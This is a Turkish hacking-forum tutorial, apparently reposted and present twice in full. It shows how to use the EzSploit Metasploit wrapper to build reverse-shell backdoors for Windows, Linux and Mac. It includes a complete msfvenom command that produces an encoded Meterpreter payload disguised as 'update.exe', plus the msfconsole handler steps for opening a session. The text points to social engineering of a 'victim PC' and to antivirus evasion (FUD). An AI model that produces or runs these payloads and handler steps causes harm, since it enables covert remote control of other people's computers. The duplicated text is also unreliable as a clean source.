Öncelikle olarak kolay gelsin diyelim.
Konumuzda Windows,Linux ve Mac işletim sistemleri için Backdoor hazırlama
ve Windows içi oluşturduğumuz backdoor ile Meterpreter oturumu açmayı
gösteceğiz.
İlk olarak Backdoor oluşturmak için kullanacağımız script olan Metasploit Automation Script (EzSploit)
i Kali Linux işletim sistemimize indirelim.
https://github.com/rand0m1ze/ezsploit
İşletim sistemleri için ayrı ayrı payloadoluşturabileceğimiz bu script ile işimiz kolaylaşıyor.
Scriptimize yetki vererek çalıştıralım.
Bulunduğu dizinde konsola chmod +x ezsploit.shyazıyoruz.
Sonrasında ise ./ezsploit.sh yazarak scripti çalıştırıyoruz.
Karşımıza çıkan Press [Enter] key to Continue...ekranında herhangi bir tuşa basıyoruz
ve scriptimiz açılıyor. Gördüğünüz gibi bir çok seçenek mevcuttur.
Biz msvenom ile payload oluşturmayı seçeceğiz. Bu scriptin en önemli özelliklerinden birisidir.
Hızlı ve kolay payload oluşturabiliyoruz.
Örneğin msvenom ile windows için şöyle bir payload oluşturabiliriz.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=8080 -f exe --platform windows -a x86 -e x86/shikata_ga_nai -i 10 > /var/www/html/update.exe
EzSploit hızlı bir şekilde Masaüstü Tempklasörüne istediğimiz payload ı oluşturuyor.
Örneğin bir windows payload oluşturalım..
İlk olarak birinci seçenek olan Payload [Create a payload with msvenom] için 1 e basıyor ve enter diyoruz.
Sonrasında ise hangi işletim sistemi için payload oluşturmak istiyorsak onu seçiyoruz.
Örnek olarak yine windowsu seçip enter yapıyoruz.
Sonrasında LHOST= bilgisine ifconfigkomutuyla kontrol edebildiğimiz arayüzümüzde(eth0 veya wlan0) geçerli olan
inet IP adresimi yazıyoruz.. LPORT= için ise backdoor için uygun olan bir port giriyoruz. Örneğin : 4556
Shell.exe bilgilendirmede gözüktüğü gibi /Desktop/temp klasörü içerisine oluşturuldu.
Aynı yöntem ile diğer işletim sistemlerinede Backdoor oluşturabiliriz.
Hemen oluşturalım.
Linux için oluşturduk ve temp klasörü içerisine shell.elf olarak kaydedildi.
Mac için oluşturduk ve temp klasörü içerisine shell.macho olarak kaydedildi.
Bu şekilde işletim sistemleri için Backdooroluşturabiliriz.
Masaüstü temp klasörü içerisine backdoorlar oluşturuldu.
Şimdi ise Windows için hazırladığımız Backdoor ile Meterpreter oturumu açmayı gösterelim.
Yine Exsploit üzerinden seçenek 3 Exploit Drop into msfconsole ’u seçiyoruz.
Görüldüğü gibi Metasploit Framework Consoleaktif hale geldi.
Meterpreter oturumu başlatmamız için ilk önce PAYLOAD türünü belirtmemiz gerekmektedir.
Biz windows için başlatacağımızdan dolayı windows/meterpreter/reverse_tcpmetodunu kullanacağız.
İlk önce MSF konsola use exploit/multi/handleryazıyoruz.
Sonrasında Payload türü belirtiyoruz. set PAYLOAD windows/meterpreter/reverse_tcpyazıyoruz.
Son olarak SHELL oluştururken kullandığımız Local IP ve PORT bilgilerimizi giriyoruz.
set LHOST IP ve set LPORT port şeklinde. Exploit diyerek oturumu başlatıyoruz.
Oluşturduğumuz shell.exe i windows PC de çeşitli yöntemlerle çalıştırmamız gerekiyor.
Bu yöntem sizin Kurban PC e yaklaşımınız ve sosyal mühendislik yönteminize kalmış bir durumdur.
Örnek olarak Sanal Windows PC ’de localhost web arayüzü üzerinden shell.exe i indirip çalıştıralım.
Gördüğünüz gibi shell i çalıştırdığımızda meterpreter oturumuda açıldı.
Oturum üzerinden meterpreter komutlarıyladilediğinizi gerçekleştirebilirsiniz.
Örneğin sysinfo yazarak PC bilgilerine göz attık.
Bir önemli konudan daha bahsetmek isteriz ki buda FUD kavramıdır. ;
Az önceki testi yaparken Windows PC tamamen korunmasızdı ve rahatça shell çalıştırdık.
Ancak korumalı PC lerde shell çalıştırmak için özel Bypass yöntemleri mevcuttur.
Bu yöntemlerin işlenmesine FUDdenmektedir yani anti virüslerden saklamak ve onları atlatma işlemidir.
Alıntıdır..
Konumuzda Windows,Linux ve Mac işletim sistemleri için Backdoor hazırlama
ve Windows içi oluşturduğumuz backdoor ile Meterpreter oturumu açmayı
gösteceğiz.
İlk olarak Backdoor oluşturmak için kullanacağımız script olan Metasploit Automation Script (EzSploit)
i Kali Linux işletim sistemimize indirelim.
https://github.com/rand0m1ze/ezsploit
İşletim sistemleri için ayrı ayrı payloadoluşturabileceğimiz bu script ile işimiz kolaylaşıyor.
Scriptimize yetki vererek çalıştıralım.
Bulunduğu dizinde konsola chmod +x ezsploit.shyazıyoruz.
Sonrasında ise ./ezsploit.sh yazarak scripti çalıştırıyoruz.
Karşımıza çıkan Press [Enter] key to Continue...ekranında herhangi bir tuşa basıyoruz
ve scriptimiz açılıyor. Gördüğünüz gibi bir çok seçenek mevcuttur.
Biz msvenom ile payload oluşturmayı seçeceğiz. Bu scriptin en önemli özelliklerinden birisidir.
Hızlı ve kolay payload oluşturabiliyoruz.
Örneğin msvenom ile windows için şöyle bir payload oluşturabiliriz.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=8080 -f exe --platform windows -a x86 -e x86/shikata_ga_nai -i 10 > /var/www/html/update.exe
EzSploit hızlı bir şekilde Masaüstü Tempklasörüne istediğimiz payload ı oluşturuyor.
Örneğin bir windows payload oluşturalım..
İlk olarak birinci seçenek olan Payload [Create a payload with msvenom] için 1 e basıyor ve enter diyoruz.
Sonrasında ise hangi işletim sistemi için payload oluşturmak istiyorsak onu seçiyoruz.
Örnek olarak yine windowsu seçip enter yapıyoruz.
Sonrasında LHOST= bilgisine ifconfigkomutuyla kontrol edebildiğimiz arayüzümüzde(eth0 veya wlan0) geçerli olan
inet IP adresimi yazıyoruz.. LPORT= için ise backdoor için uygun olan bir port giriyoruz. Örneğin : 4556
Shell.exe bilgilendirmede gözüktüğü gibi /Desktop/temp klasörü içerisine oluşturuldu.
Aynı yöntem ile diğer işletim sistemlerinede Backdoor oluşturabiliriz.
Hemen oluşturalım.
Linux için oluşturduk ve temp klasörü içerisine shell.elf olarak kaydedildi.
Mac için oluşturduk ve temp klasörü içerisine shell.macho olarak kaydedildi.
Bu şekilde işletim sistemleri için Backdooroluşturabiliriz.
Masaüstü temp klasörü içerisine backdoorlar oluşturuldu.
Şimdi ise Windows için hazırladığımız Backdoor ile Meterpreter oturumu açmayı gösterelim.
Yine Exsploit üzerinden seçenek 3 Exploit Drop into msfconsole ’u seçiyoruz.
Görüldüğü gibi Metasploit Framework Consoleaktif hale geldi.
Meterpreter oturumu başlatmamız için ilk önce PAYLOAD türünü belirtmemiz gerekmektedir.
Biz windows için başlatacağımızdan dolayı windows/meterpreter/reverse_tcpmetodunu kullanacağız.
İlk önce MSF konsola use exploit/multi/handleryazıyoruz.
Sonrasında Payload türü belirtiyoruz. set PAYLOAD windows/meterpreter/reverse_tcpyazıyoruz.
Son olarak SHELL oluştururken kullandığımız Local IP ve PORT bilgilerimizi giriyoruz.
set LHOST IP ve set LPORT port şeklinde. Exploit diyerek oturumu başlatıyoruz.
Oluşturduğumuz shell.exe i windows PC de çeşitli yöntemlerle çalıştırmamız gerekiyor.
Bu yöntem sizin Kurban PC e yaklaşımınız ve sosyal mühendislik yönteminize kalmış bir durumdur.
Örnek olarak Sanal Windows PC ’de localhost web arayüzü üzerinden shell.exe i indirip çalıştıralım.
Gördüğünüz gibi shell i çalıştırdığımızda meterpreter oturumuda açıldı.
Oturum üzerinden meterpreter komutlarıyladilediğinizi gerçekleştirebilirsiniz.
Örneğin sysinfo yazarak PC bilgilerine göz attık.
Bir önemli konudan daha bahsetmek isteriz ki buda FUD kavramıdır. ;
Az önceki testi yaparken Windows PC tamamen korunmasızdı ve rahatça shell çalıştırdık.
Ancak korumalı PC lerde shell çalıştırmak için özel Bypass yöntemleri mevcuttur.
Bu yöntemlerin işlenmesine FUDdenmektedir yani anti virüslerden saklamak ve onları atlatma işlemidir.
Alıntıdır..
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl